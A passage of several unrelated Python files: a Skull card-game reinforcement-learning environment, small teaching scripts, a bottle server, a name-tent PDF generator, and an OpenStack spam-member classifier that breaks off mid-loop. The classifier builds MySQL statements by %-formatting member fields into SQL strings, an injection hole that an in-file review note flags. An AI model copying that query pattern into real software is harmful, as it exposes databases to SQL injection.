        """Back to start-of-game: three flowers plus one skull, nothing played."""
        self.pocket = [Card(1),Card(1),Card(1),Card(2)]
        self.frontCards = []
        self.points = 0
        self.relative_order = 0
        self.reward_pending = False   # Action awaiting a reward callback
        self.last_skull = 0           # rounds since this player last cleared
        self.max_bet = 0              # highest bet made this round

    def __init__(self, name):
        # Wrap the shared seat counter so a fifth construction restarts at 0.
        if Player.index > 3:
            Player.index = 0
        self.index = Player.index
        Player.index += 1
        self.name = name

    def public_front(self):
        """Played cards as opponents see them (state codes), 0-padded to 4."""
        front = []
        for x in range(4):
            try:
                front.append(self.frontCards[x].state)
            except:
                front.append(0)
        return front

    def private_front(self):
        """Played cards as the owner sees them (true values), 0-padded to 4."""
        front = []
        for x in range(4):
            try:
                front.append(self.frontCards[x].value)
            except:
                front.append(0)
        return front

    def clear(self):
        """Take every played card back into the pocket and refresh round stats."""
        for card in self.frontCards:
            self.pocket.append(card)
        self.frontCards = []
        self.refresh_stats()

    def has_skull(self):
        """1 if the skull is still in the pocket, else 0."""
        if 2 in [card.value for card in self.pocket]: return 1
        else: return 0

    def nbr_flowers(self):
        """Number of flower cards left in the pocket."""
        return [card.value for card in self.pocket].count(1)

    def play_flower(self):
        """Move one flower from the pocket to the table, face down."""
        for card in self.pocket:
            if card.value == 1:
                card.state = -1
                self.frontCards.append(card)
                self.pocket.remove(card)
                return

    def play_skull(self):
        """Move the skull from the pocket to the table, face down."""
        for card in self.pocket:
            if card.value == 2:
                card.state = -1
                self.frontCards.append(card)
                self.pocket.remove(card)
                return

    def show(self):
        """Reveal this player's most recently played unrevealed card.

        Returns the revealed card's value, or 0 when nothing was hidden.
        """
        i = 1
        while i <= len(self.frontCards):
            card = self.frontCards[-i]
            if card.state == -1:
                card.state = card.value
                return card.state
            i+=1
        return 0

    def pocket_str(self):
        """Human-readable private view of the pocket."""
        s = ''
        for card in self.pocket:
            s += card.__str__(0) + ', '
        return s

    def front_str(self):
        # NOTE(review): iterates self.pocket, not self.frontCards, despite
        # the name -- looks like a copy/paste bug; confirm before relying on it.
        s = ''
        for card in self.pocket:
            s += str(card) + ', '
        return s

    def __str__(self):
        pocket = """
        id : {}
        points: {}
        pocket: {}
        """.format(names[self.index], self.points, self.pocket_str())
        return pocket

    def skulled(self):
        """Penalty for revealing a skull: reclaim cards, lose one at random.

        Returns 1 when a card was removed, 0 when the pocket was empty.
        """
        self.clear()
        try:
            self.pocket.remove(self.pocket[randrange(len(self.pocket))])
            return 1
        except:
            return 0

    def has_hidden_cards(self):
        """True when any played card is still face down (state -1)."""
        return -1 in [card for card in self.public_front()]

    def has_cards(self):
        """True while the player still owns at least one card."""
        return self.nbr_flowers() + self.has_skull() > 0

    def win(self, reward_func):
        self.reward(1, reward_func)

    def lose(self, reward_func):
        self.reward(-1, reward_func)

    def play(self, state, legal_moves, forward_func, reward_func):
        """Choose an Action given the observation and the legal-move mask.

        Settles any pending reward first, then (for AI players) runs the
        model forward pass and picks the highest-probability legal move.
        NOTE(review): for names containing 'Human' no index is assigned
        here, so `actions[index]` below would raise -- confirm how human
        play is wired in.
        """
        if self.reward_pending:
            self.reward(0, reward_func)
        if 'Human' not in self.name:
            state = format_state(state)
            if legal_moves.count(1) > 1:
                legal_moves = np.array(legal_moves)
                probas = forward_func(state, self.name)
                probas *= legal_moves   # mask out illegal moves
                #if not math.isnan(probas):
                try:
                    index = list(probas).index(probas.max())
                except:
                    print(probas)
                    print(legal_moves)
                    index = 0
            else:
                # Only one legal move: still run the forward pass (for
                # bookkeeping) but skip the argmax.
                forward_func(state, self.name, 0)
                index = legal_moves.index(1)
        actions.sort(key = lambda c: c.index)
        try: action = actions[index]
        except:
            print(actions, index, state, legal_moves)
            raise IndexError
        self.reward_pending = action
        # Track round statistics fed back into future observations.
        if action.type == 'BET' and action.value > self.max_bet: self.max_bet = action.value
        elif action.type == 'CARD' and action.value == 0: self.last_skull = 0
        return action

    def refresh_stats(self):
        """Per-round reset: clear the max bet, age the last-skull counter."""
        self.max_bet = 0
        self.last_skull += 1

    def reward(self, amount, reward_func, action = None):
        """Send `amount` for the pending (or given) action to the model."""
        try:
            if action == None: action = self.reward_pending.index
        except:
            print('ERROR')
            print(self)
        reward_func(amount, action, self.name)
        self.reward_pending = False

    def pocket_length(self):
        return len(self.pocket)
class Env:
    """Four-player Skull game environment driven by external model callbacks.

    `forward`/`reward` callables are injected via step(); observations are
    built relative to each player's seat.
    NOTE(review): the source indentation was reconstructed -- the nesting of
    a few else-branches in card_stage/bet_stage/show stages should be
    confirmed against the original file.
    """

    def __init__(self, players):
        self.nbr_players = len(players)
        self.players = [Player(player) for player in players]
        self.alive_players = [player for player in self.players]
        self.iters = 1000
        self.next_player = None
        self.order = []   # current seating order, set by order_players(start=1)

    def __str__(self, g = True):
        players = ''
        for player in self.players:
            players += str(player)
        return players

    def relative_fronts(self,player):
        # Other players' public fronts, in this player's relative seat order.
        fronts = [self.order[x].public_front() for x in player.relative_order]
        return fronts

    def relative_points(self,player):
        return [self.order[x].points for x in player.relative_order]

    def relative_in_game_players(self,player, in_game_players):
        order = [self.order[x] for x in player.relative_order]
        return [x in in_game_players for x in order]

    def relative_hidden_cards(self, player):
        # 1 * bool-array coerces booleans to 0/1 ints.
        return (1 * np.array([self.order[x].has_hidden_cards() for x in player.relative_order])).tolist()

    def relative_bet_holder(self, player, bet_holder):
        """Seat distance from player to the bet holder, or -1 when no bet yet."""
        if bet_holder == None: return -1
        if bet_holder in self.order[self.order.index(player):]:
            return self.order.index(bet_holder) - self.order.index(player)
        else:
            return 5 - self.order.index(player) + self.order.index(bet_holder)

    def relative_pockets(self, player):
        return [self.order[x].pocket_length() for x in player.relative_order]

    def relative_bets(self,player):
        return [self.order[x].max_bet for x in player.relative_order]

    def relative_last_skull(self,player):
        return [self.order[x].last_skull for x in player.relative_order]

    def state(self,player, bet, bet_holder,in_game_players):
        """Full observation dict from this player's point of view."""
        return {'FLOWERS':player.nbr_flowers(), 'SKULL':player.has_skull(), 'FRONTS':self.relative_fronts(player),
                'OWN_FRONT':player.private_front(), 'HAS_HIDDEN':self.relative_hidden_cards(player),
                'ALIVE':self.relative_in_game_players(player,in_game_players),
                'NBR_CARDS':self.nbr_cards(), 'BET':bet, 'POCKETS':self.relative_pockets(player),
                'BET_HOLDER':self.relative_bet_holder(player, bet_holder), 'POINTS':self.relative_points(player),'LAST SKULLS': self.relative_last_skull(player), 'BETS':self.relative_bets(player)}

    def order_players(self, start = 0, previous_player = 0):
        """Return the play order starting after previous_player.

        With start=1 the seats are reshuffled and each player's
        relative_order (other seats, clockwise from them) is rebuilt.
        """
        if start:
            self.order = []
            order = list(range(len(self.players)))
            shuffle(order)
            for x in order:
                new_player = self.players[x]
                self.order.append(new_player)
            for new_player in self.order:
                l = list(range(self.nbr_players))
                l_2 =l[self.order.index(new_player):] + l[:self.order.index(new_player)]
                l_2.remove(self.order.index(new_player))
                new_player.relative_order = l_2
            previous_player = -1
        next_player = previous_player + 1
        if next_player == self.nbr_players: next_player = 0
        order = self.order[next_player:] + self.order[:next_player]
        return order

    def reset_players(self):
        for player in self.players:
            player.reset()

    def nbr_cards(self):
        """Total face-down cards on the table (hidden cards have state -1)."""
        array = np.array([front for front in [player.public_front() for player in self.players]]).flatten()
        return -array.sum()

    def clear_players(self):
        for player in self.players: player.clear()

    def kill(self,player):
        """Remove a player with no cards left from the game."""
        player.clear()
        self.alive_players.remove(player)

    def get_choice(self, player, bet, bet_holder, in_game_players):
        """Build the observation + legal-move mask and ask the player to act."""
        state = self.state(player, bet, bet_holder, in_game_players)
        legal_moves = self.get_legal_moves(player, state, in_game_players)
        choice = player.play(state, legal_moves, self.forward, self.reward)
        return choice

    def card_stage(self):
        """Card-laying phase: loop until somebody opens the betting."""
        bet = 0
        bet_holder = None
        in_game_players = [player for player in self.alive_players]
        while bet == 0 :
            for player in self.order_players():
                choice = self.get_choice(player, bet, bet_holder, in_game_players)
                if player in in_game_players:
                    if choice.type == 'CARD' and player.has_cards():
                        if choice.value == 1 and player.nbr_flowers() > 0:
                            player.play_flower()
                        elif choice.value == 0 and player.has_skull():
                            player.play_skull()
                        else:
                            # Invalid card choice: forced minimum bet.
                            bet = 1
                            bet_holder = player
                    elif choice.value > 0:
                        bet = choice.value
                        bet_holder = player
                        break
                    else:
                        # Neither a playable card nor a positive bet.
                        bet = 1
                        bet_holder = player
                        break
        return bet, bet_holder, in_game_players

    def bet_stage(self, bet, bet_holder, in_game_players):
        """Bidding phase: raise or fold until one bidder remains."""
        nbr_cards = self.nbr_cards()
        restart_index = self.order.index(bet_holder)
        while len(in_game_players) > 1:
            for player in self.order_players(previous_player = restart_index):
                choice = self.get_choice(player, bet, bet_holder, in_game_players)
                if player in in_game_players:
                    if choice.type == 'BET' and nbr_cards >= choice.value > bet:
                        bet = choice.value
                        bet_holder = player
                        # Betting every card on the table ends bidding at once.
                        if choice.value == nbr_cards: in_game_players = [player]
                        break
                    else:
                        # Anything else counts as folding.
                        in_game_players.remove(player)
                        if len(in_game_players) <=1: break
        return bet, bet_holder, in_game_players

    def show_self_stage(self,bet,bet_holder,in_game_players):
        """The bet holder must first reveal their own face-down cards."""
        shown_cards = 0
        player = bet_holder
        while bet_holder.has_hidden_cards() and shown_cards <bet:
            card = bet_holder.show()
            if card != 1:
                # Revealed own skull: challenge fails immediately.
                player.skulled()
                if not player.has_cards():
                    self.kill(player)
                in_game_players = []
                break
            else:
                shown_cards += 1
        return shown_cards, in_game_players

    def show_stage(self, bet, bet_holder, in_game_players,shown_cards):
        """The bet holder reveals opponents' cards until the bet is met or a skull appears."""
        restart_index = self.order.index(bet_holder)
        while shown_cards < bet and len(in_game_players)>0:
            if shown_cards >= bet: break
            if bet_holder not in in_game_players: break
            for player in self.order_players(previous_player = restart_index):
                choice = self.get_choice(player, bet, bet_holder, in_game_players)
                if player == bet_holder:
                    if choice.type == 'SHOW':
                        # SHOW value selects which relative opponent to flip.
                        card = self.order[player.relative_order[choice.value-1]].show()
                        if card != 1:
                            player.skulled()
                            if not player.has_cards():
                                self.kill(player)
                            in_game_players = []
                            break
                        else:
                            shown_cards += 1
                    else:
                        # Non-SHOW action while holding the bet: treated as failure.
                        player.skulled()
                        if not player.has_cards():
                            self.kill(player)
                        in_game_players = []
                        break
        return shown_cards

    def step(self, iters, forward, reward):
        """Play `iters` full games; return one one-hot winner row per game."""
        self.forward = forward
        self.reward = reward
        results = []
        for iter in range(iters):
            self.reset_players()
            rnd = 1
            self.alive_players = [player for player in self.players]
            winner = 0
            order = self.order_players(start=1)
            while winner == 0:
                bet, bet_holder, in_game_players = self.card_stage()
                bet, bet_holder, in_game_players = self.bet_stage(bet, bet_holder, in_game_players)
                shown_cards, in_game_players = self.show_self_stage(bet, bet_holder, in_game_players)
                shown_cards = self.show_stage(bet, bet_holder, in_game_players,shown_cards)
                if shown_cards >= bet:
                    # Challenge succeeded; two points win the game.
                    bet_holder.points += 1
                    if bet_holder.points == 2:
                        winner = bet_holder
                if len(self.alive_players) <= 1:
                    break
                self.clear_players()
            if winner:
                winner.win(self.reward)
                for player in self.players:
                    if player != winner:
                        player.lose(self.reward)
                result = [0,0,0,0]
                result[self.players.index(winner)] = 1
                results.append(result)
            else:
                # Everyone eliminated: no winner this game.
                for player in self.players:
                    player.lose(self.reward)
                results.append([0,0,0,0])
        return results

    def get_legal_moves(self,player, state, in_game_players):
        """Return a 22-long 0/1 mask over the global action space.

        Index layout: 0-1 CARD(skull/flower), 2-17 BET(0..15), 18 ABANDON,
        19-21 SHOW(opponent 1..3).
        """
        if player in in_game_players:
            indexes = list(range(22))
            if state['BET_HOLDER'] == 0:
                # Player holds the bet: only SHOW moves, restricted to
                # opponents that still have hidden cards.
                indexes = indexes[19:]
                x = 0
                for v in state['HAS_HIDDEN']:
                    if not v:
                        indexes.remove(indexes[x])
                        x-=1
                    x+=1
            else:
                # Bets cannot exceed the number of cards on the table.
                indexes = indexes[:state['NBR_CARDS']+2]
                if state['BET'] != 0 or not True in [ x >0 for x in [state['FLOWERS'], state['SKULL']]]:
                    # Betting already open (or no cards to play): must raise
                    # above the current bet or abandon.
                    for index in indexes[:state['BET']+3]: indexes.remove(index)
                    indexes.append(18)
                else :
                    indexes = indexes[:19]
                    # If any alive opponent has no hidden cards, only card
                    # plays are allowed (no opening bet yet).
                    x = 0
                    while x < len(state['HAS_HIDDEN']):
                        if not state['HAS_HIDDEN'][x] and state['ALIVE'][x]:
                            indexes = indexes[:2]
                            break
                        x+=1
                    if 0 in state['OWN_FRONT']:
                        # Must still play a card; drop whichever card type
                        # the player no longer owns.
                        indexes = indexes[:2]
                        if state['FLOWERS'] < 1:
                            indexes.remove(indexes[1])
                        elif state['SKULL'] == 0:
                            indexes.remove(indexes[0])
        else:
            # Folded players can only ABANDON.
            indexes = [18]
        response = [0 for x in range(22)]
        for i in indexes : response[i] = 1
        return response
class Env_Process(Process):
    """Runs one Env game loop in a child process, talking to model processes over pipes."""

    def __init__(self, conn, models):
        # NOTE(review): start() is called from __init__, so the child
        # process is already running when the constructor returns.
        Process.__init__(self, target = Env_Process.step, args =(conn,
                         models))
        self.start()

    def step(conn, models):
        # Executed in the child process (plain function, no self).
        model_names = list(models.keys())
        env = Env(model_names)
        parent_conn, child_conn = Pipe()
        def forward(state, agent_name, forward_pass = 1):
            # Ask the agent's model process for action probabilities;
            # message code 1 = forward request.
            models[agent_name].send([1, [state, forward_pass], child_conn])
            if forward_pass:
                probas = parent_conn.recv()
                return probas
        def reward(amount, action, agent_name):
            # Message code 2 = reward notification.
            models[agent_name].send([2, [amount, action]])
        results = env.step(25, forward, reward)
        # Message code 3 = batch of game results back to the coordinator.
        conn.send([3, [results, model_names]])
|
# Month names indexed 1..12 — replaces the original chain of twelve
# if-statements that mapped the numeric month to its Spanish name.
_MESES = ("Enero", "Febrero", "Marzo", "Abril", "Mayo", "Junio",
          "Julio", "Agosto", "Septiembre", "Octubre", "Noviembre", "Diciembre")


def fecha():
    """Read a date from stdin and print it with the month spelled in Spanish.

    Prompts (in Spanish) for day, month and year, re-asking until the day is
    in 1..31 and the month in 1..12.  Fixes from the original: Python 2-only
    `print d, m, a` syntax, the mojibake prompt "aลo" (now "año"), and the
    12-branch month-name if-chain (now a table lookup).  Note: day validity
    is still not checked against the chosen month (e.g. 31 Febrero passes),
    matching the original behaviour.
    """
    while True:
        d = int(input("Introduzca el dia: "))
        if 1 <= d <= 31:
            break
        print("ERROR: Dia incorrecto. ")
    while True:
        m = int(input("Introduzca el mes: "))
        if 1 <= m <= 12:
            break
        print("ERROR: Mes incorrecto. ")
    a = int(input("Introduzca un año: "))
    print(d, _MESES[m - 1], a)


if __name__ == "__main__":
    fecha()
|
#Momentum
#Preparation-----------------------------------------------------------
# These are the libraries that will be used for this lab.
import torch
import torch.nn as nn
import matplotlib.pylab as plt
import numpy as np
# Fix the RNG seed so the random weight init and noise are reproducible.
torch.manual_seed(0)
# This function plots the cubic objective and the parameter values obtained
# via Gradient Descent.
def plot_cubic(w, optimizer):
    """Plot the cubic objective and the SGD parameter trajectory.

    Args:
        w: a module exposing a single weight at state_dict()['linear.weight'][0]
           (e.g. the `one_param` module defined in this lab).
        optimizer: a torch optimizer driving w's parameters.

    Side effects: mutates w's weight (ends wherever SGD leaves it) and draws
    on the current matplotlib figure.
    """
    LOSS = []
    # Sweep the weight over [-4, 4) to trace the objective curve.
    W = torch.arange(-4, 4, 0.1)
    for w.state_dict()['linear.weight'][0] in W:
        LOSS.append(cubic(w(torch.tensor([[1.0]]))).item())
    # Reset the weight to the descent's starting point.
    w.state_dict()['linear.weight'][0] = 4.0
    n_epochs = 10
    parameter = []
    loss_list = []
    for n in range(n_epochs):
        optimizer.zero_grad()
        loss = cubic(w(torch.tensor([[1.0]])))
        # FIX: store the scalar, not the live tensor — the original appended
        # `loss` itself, keeping every autograd graph alive and handing
        # matplotlib tensors instead of floats.
        loss_list.append(loss.item())
        parameter.append(w.state_dict()['linear.weight'][0].detach().data.item())
        loss.backward()
        optimizer.step()
    plt.plot(parameter, loss_list, 'ro', label='parameter values')
    plt.plot(W.numpy(), LOSS, label='objective function')
    plt.xlabel('w')
    plt.ylabel('l(w)')
    plt.legend()
# This function plots a 4th-order objective and the parameter values obtained
# via Gradient Descent.  Gaussian noise with standard deviation `std` can be
# added to the loss.
def plot_fourth_order(w, optimizer, std=0, color='r', paramlabel='parameter values', objfun=True):
    """Plot the fourth-order objective and the SGD parameter trajectory.

    Args:
        w: module exposing a single weight at state_dict()['linear.weight'][0].
        optimizer: torch optimizer driving w's parameters.
        std: stddev of Gaussian noise added to each loss evaluation.
        color: matplotlib color for the trajectory markers.
        paramlabel: legend label for the trajectory.
        objfun: when True, also draw the noiseless objective curve.

    Side effects: mutates w's weight and draws on the current figure.
    """
    W = torch.arange(-4, 6, 0.1)
    LOSS = []
    # Trace the noiseless objective over the sweep range.
    for w.state_dict()['linear.weight'][0] in W:
        LOSS.append(fourth_order(w(torch.tensor([[1.0]]))).item())
    # Start the descent from w = 6 (right of the local minimum).
    w.state_dict()['linear.weight'][0] = 6
    n_epochs = 100
    parameter = []
    loss_list = []
    for n in range(n_epochs):
        optimizer.zero_grad()
        loss = fourth_order(w(torch.tensor([[1.0]]))) + std * torch.randn(1, 1)
        # FIX: store the scalar, not the live 1x1 tensor — the original kept
        # the whole autograd graph per epoch and plotted tensors.
        loss_list.append(loss.item())
        parameter.append(w.state_dict()['linear.weight'][0].detach().data.item())
        loss.backward()
        optimizer.step()
    # Plotting
    if objfun:
        plt.plot(W.numpy(), LOSS, label='objective function')
    plt.plot(parameter, loss_list, 'ro', label=paramlabel, color=color)
    plt.xlabel('w')
    plt.ylabel('l(w)')
    plt.legend()
# A custom module that behaves like a single scalar parameter, so PyTorch's
# built-in optimizers can drive it.
class one_param(nn.Module):
    """Wrap one trainable weight behind a bias-free linear layer."""

    def __init__(self, input_size, output_size):
        super(one_param, self).__init__()
        # Single weight, no bias: calling the module computes weight * x.
        self.linear = nn.Linear(input_size, output_size, bias=False)

    def forward(self, x):
        """Apply the linear map to `x` and return the result."""
        return self.linear(x)
#We create an object w, when we call the object with an input of one, it will behave like an individual parameter value. i.e w(1) is analogous to $w$
# Create a one_param object
# Shared by every experiment below; each plot_* call mutates its weight.
w = one_param(1, 1)
# Saddle Points --------------------------------------------------------------
# A cubic objective l(w) = w**3, which has a saddle point at w = 0.
def cubic(yhat):
    """Return the element-wise cube of the prediction `yhat`."""
    return yhat ** 3
#We create an optimizer with no momentum term
# Create a optimizer without momentum
optimizer = torch.optim.SGD(w.parameters(), lr=0.01, momentum=0)
#We run several iterations of stochastic gradient descent and plot the results. We see the parameter values get stuck in the saddle point.
# Plot the model (no momentum: descent stalls at the saddle point w = 0)
plot_cubic(w, optimizer)
#we create an optimizer with momentum term of 0.9
# Create a optimizer with momentum
optimizer = torch.optim.SGD(w.parameters(), lr=0.01, momentum=0.90)
#We run several iterations of stochastic gradient descent with momentum and plot the results. We see the parameter values do not get stuck in the saddle point.
# Plot the model (momentum carries the parameter past the saddle point)
plot_cubic(w, optimizer)
# Local Minima ---------------------------------------------------------------
# Fourth-order polynomial with a local minimum near w = 4 and the global
# minimum near w = -2; used to show how momentum affects convergence.
def fourth_order(yhat):
    """Return the mean of 2*y^4 - 9*y^3 - 21*y^2 + 88*y + 48 over `yhat`."""
    poly = 2 * (yhat ** 4) - 9 * (yhat ** 3) - 21 * (yhat ** 2) + 88 * yhat + 48
    return torch.mean(poly)
#We create an optimizer with no momentum term. We run several iterations of stochastic gradient descent and plot the results.
#We see the parameter values get stuck in the local minimum.
# Make the prediction without momentum (descent stalls in the local minimum)
optimizer = torch.optim.SGD(w.parameters(), lr=0.001)
plot_fourth_order(w, optimizer)
#We create an optimizer with a momentum term of 0.9. We run several iterations of stochastic gradient descent and plot the results.
#We see the parameter values reach a global minimum.
# Make the prediction with momentum (escapes the local minimum)
optimizer = torch.optim.SGD(w.parameters(), lr=0.001, momentum=0.9)
plot_fourth_order(w, optimizer)
#Noise-------------------------------------------------------------------------------------
#In this section, we will create a fourth order polynomial with a local minimum at 4 and a global minimum a -2,
#but we will add noise to the function when the Gradient is calculated. We will then see how the momentum parameter affects convergence to a global minimum.
#with no momentum, we get stuck in a local minimum
# Make the prediction without momentum when there is noise
optimizer = torch.optim.SGD(w.parameters(), lr=0.001)
plot_fourth_order(w, optimizer, std=10)
#with momentum, we get to the global minimum
# Make the prediction with momentum when there is noise
optimizer = torch.optim.SGD(w.parameters(), lr=0.001,momentum=0.9)
plot_fourth_order(w, optimizer, std=10)
#Practice--------------------------------------------------------------------------------
#Create two SGD objects with a learning rate of 0.001. Use the default momentum parameter value for one and a value of 0.9 for the second.
#Use the function plot_fourth_order with an std=100, to plot the different steps of each. Make sure you run the function on two independent cells.
## Practice: Create two SGD optimizer with lr = 0.001, and one without momentum and the other with momentum = 0.9. Plot the result out.
optimizer1 = torch.optim.SGD(w.parameters(), lr = 0.001)
plot_fourth_order(w, optimizer1, std = 100, color = 'black', paramlabel = 'parameter values with optimizer 1')
optimizer2 = torch.optim.SGD(w.parameters(), lr = 0.001, momentum = 0.9)
plot_fourth_order(w, optimizer2, std = 100, color = 'red', paramlabel = 'parameter values with optimizer 2', objfun = False)
"""
Set up website, point to index.html and supporting files.
Think MVC not directories...
Orig path: '/LOC/Falcon/Falcon/static'
"""
import bottle as web
import os
# Memory Game
@web.route('/')
@web.route('/<name>')
@web.view('mem_game')
def index(name='Memorizer'):
    """Render the memory-game template, greeting the visitor by `name`."""
    return {'name': name}
# Resource files
@web.route('/resource/<filename>')
def resource_files(filename):
    """Serve static files from the `resource` directory next to this module.

    Renamed from `index`: four handlers in this module shared that name, each
    definition shadowing the previous one (routes still bound at decoration
    time, but the names were unusable and confusing).  os.path.join replaces
    the Windows-only backslash concatenation so the path works on every OS.
    """
    res_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'resource')
    return web.static_file(filename, root=res_path)
# Application files
@web.route('/app/<filename>')
def app_files(filename):
    """Serve static files from the `app` directory next to this module.

    Renamed from `index` to stop shadowing the module's other handlers, and
    switched to os.path.join instead of Windows-only backslash concatenation
    so the path is correct on every OS.
    """
    app_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'app')
    return web.static_file(filename, root=app_path)
# Data files
@web.route('/data/<filename>')
def data_files(filename):
    """Serve static files from the `data` directory next to this module.

    Renamed from `index` to stop shadowing the module's other handlers, and
    switched to os.path.join instead of Windows-only backslash concatenation
    so the path is correct on every OS.
    """
    data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
    return web.static_file(filename, root=data_path)
# Start bottle's built-in development server (blocking call; debug mode on).
web.run(host='localhost', port=8080, debug=True)
|
#!/usr/bin/env python3
import sys
import render_pdf
import render_mini_pdf
import pandas as pd
import numpy as np
def get_name_talents(series):
    """Return (name, talents) extracted from one roster row.

    `series` maps column labels to values; the talents are the five strength
    columns S1..S5, returned as a tuple in order.
    """
    talents = tuple(series[col] for col in ('S1', 'S2', 'S3', 'S4', 'S5'))
    return (series['Name'], talents)
def _has_missing(talents):
    """True when any talent entry is missing (NaN).

    FIX: the original tested `np.nan in talents`, which relies on identity /
    equality with the np.nan singleton; NaN values coming out of pandas are
    usually distinct float objects and NaN != NaN, so missing strengths were
    silently not detected.  pd.isna handles every NaN correctly.
    """
    return any(pd.isna(t) for t in talents)


def main(xlfname, output_dir, imgfname=None, mini=False):
    """Render two-up name tents for every roster member with strengths.

    Args:
        xlfname: Excel roster ("vRO US and Canada June 2020 Master Roster.xlsx"
                 format) with a "Roster" sheet.
        output_dir: directory receiving output.pdf.
        imgfname: optional background image passed through to the renderer.
        mini: when True use the render_mini_pdf layout.

    Members with any missing strength are skipped; leftover members from
    skipped pairs are collected as spares and paired up at the end.
    """
    renderer = render_mini_pdf if mini else render_pdf
    df = pd.read_excel(xlfname, sheet_name="Roster")
    name_tent = renderer.MultiPageNameTent('{:s}/output.pdf'.format(output_dir))
    spares = []
    if len(df) % 2 == 1:
        # Odd row count: hold the last member back as a spare.
        spares.append(get_name_talents(df.iloc[len(df) - 1]))
        end = len(df) - 1
    else:
        end = len(df)
    for row_idx in range(0, end, 2):
        top_name, top_talents = get_name_talents(df.iloc[row_idx])
        bottom_name, bottom_talents = get_name_talents(df.iloc[row_idx + 1])
        if _has_missing(top_talents):
            print('Skipping {}: no Strengths'.format(top_name))
            if not _has_missing(bottom_talents):
                spares.append((bottom_name, bottom_talents))
            else:
                print('Skipping {}: no Strengths'.format(bottom_name))
            continue
        if _has_missing(bottom_talents):
            print('Skipping {}: no Strengths'.format(bottom_name))
            spares.append((top_name, top_talents))
            continue
        name_tent.create_page(top_name, top_talents, bottom_name, bottom_talents, imgfname)
    # Pair up the spares collected above.
    if len(spares) % 2 == 1:
        end = len(spares) - 1
        odd = True
    else:
        end = len(spares)
        odd = False
    for row_idx in range(0, end, 2):
        top_name, top_talents = spares[row_idx]
        bottom_name, bottom_talents = spares[row_idx + 1]
        name_tent.create_page(top_name, top_talents, bottom_name, bottom_talents, imgfname)
    if odd:
        top_name, top_talents = spares[-1]
        # FIX: the original called renderer.create_page (the module), not the
        # MultiPageNameTent instance, so the final odd spare crashed or was
        # written outside the open document.
        name_tent.create_page(top_name, top_talents, None, None, imgfname)
    name_tent.done()
if __name__ == '__main__':
    # CLI entry point: roster file, output directory, background image.
    if len(sys.argv) < 4:
        print('Usage: {} <xlfname> <output_dir> <imgfname>'.format(sys.argv[0]))
        raise SystemExit()
    # NOTE(review): mini=True is hard-coded, so the full-size layout is never
    # reachable from the command line — confirm this is intentional.
    main(sys.argv[1], sys.argv[2], sys.argv[3], mini=True)
|
import Tugas21m
import matplotlib.pyplot as plt
import numpy as np
# Weights for assignment, quiz, midterm and final grades (sum to 1.0).
Berat = [0.3,0.3,0.25,0.15]
# Letter grades per student, filled in the loop below.
juge = []
# Rows: [name, assignment, quiz, midterm, final].
data = [["Riky",80,76,80,80],["david",45,80,80,80],["isac",45,80,65,80],["rio",80,80,70,80],["maven",80,77,80,96],["devi",75,80,80,92],["Anggel",78,79,79,79],["Steven",69,72,68,48]]
print ("No.\t|Nama Mhs\t|N.Tgs\t|N.Kuis\t|N.UTS\t|N.UAS\t|NilaiAkhir\t|NilaiHuruf")
print("-------------------------------------------------------------------")
for i in range(len(data)) :
    # Weighted final score, then converted to a letter grade by the helper.
    nilaiAkhir = (data[i][1]*Berat[0])+(data[i][2]*Berat[1])+(data[i][3]*Berat[2])+(data[i][4]*Berat[3])
    juge.append(Tugas21m.ukurNilai(nilaiAkhir))
    print(str(i) + ".\t|" +str(data [i][0])+ "\t\t|" + str(data [i][1]) +"\t|" + str(data [i][2]) +"\t|" + str(data [i][3]) +"\t|" + str(data [i][4]) +"\t|" + str(int(nilaiAkhir))+"\t\t|" + str(juge[i]))
# Histogram of the letter-grade distribution.
y = np.array(juge)
print (y)
plt.hist(y)
plt.show()
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright (c) 2017 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pickle
import MySQLdb
from dbutils import DBConfig
import pandas.io.sql as sql
import numpy as np
import sys
# SQL templates filled in with %-formatting below.
# NOTE(review): %-interpolated SQL is vulnerable to injection if any member
# field contains quotes — consider parameterized queries (cursor.execute with
# a params tuple).
SELECT_QUERY = ("SELECT ID, Email, FirstName, Surname FROM Member WHERE Type = 'None';")
UPDATE_MEMBER = ("UPDATE Member SET Type = '%s', Active = %s WHERE ID = %s ;")
SELECT_EXISTS = ("SELECT * FROM MemberEstimatorFeed WHERE Email='%s' AND FirstName ='%s' AND Surname ='%s'")
INSERT_MEMBER_TRAINING_DATA = ("INSERT INTO MemberEstimatorFeed (Email, FirstName, Surname, Type) VALUES('%s', '%s', '%s', '%s');")
root_dir = sys.argv[1] # param: directory containing db.ini
cursor = None
config = DBConfig(root_dir+"/db.ini").read_db_config()
# NOTE(review): this script is Python 2-only (`print e` below); the
# `print("...") % (...)` lines parse as the py2 print statement applied to a
# formatted string and would break under Python 3.
try:
    # Open database connection
    db = MySQLdb.connect(**config)
    # prepare a cursor object using cursor() method
    cursor = db.cursor()
    # Load all unclassified members into a DataFrame; blank out NaNs so the
    # classifier gets clean strings.
    df = sql.read_sql(SELECT_QUERY, db)
    X_test = df.replace(np.nan, '', regex=True)
    if not X_test.empty:
        print("Member classification process excerpt :")
        print("")
        print("")
        # Pre-trained spam/ham classifier pickled alongside this script.
        classifier = pickle.load(open('member_classifier.pickle', 'rb'))
        predicted = classifier.predict(X_test.drop(['ID'], axis = 1 ))
        for item, type in zip(X_test.to_dict( orient = 'records'), predicted):
            # Mark the member; spammers are also deactivated (Active = 0).
            cursor.execute(UPDATE_MEMBER % (type, 1 if type == 'Ham' else 0, item['ID']))
            if type == 'Spam':
                print("[SPAM] - marking member (%s,%s,%s,%s) as spammer and deactivating it.") % (item['Email'].encode('utf-8'), item['FirstName'].encode('utf-8'), item['Surname'].encode('utf-8'), item['ID'])
                # Feed newly found spammers back into the training data,
                # avoiding duplicates.
                cursor.execute(SELECT_EXISTS % (item['Email'],item['FirstName'],item['Surname']))
                exists = cursor.fetchone();
                if exists is None:
                    cursor.execute(INSERT_MEMBER_TRAINING_DATA % (item['Email'], item['FirstName'], item['Surname'], type))
            else:
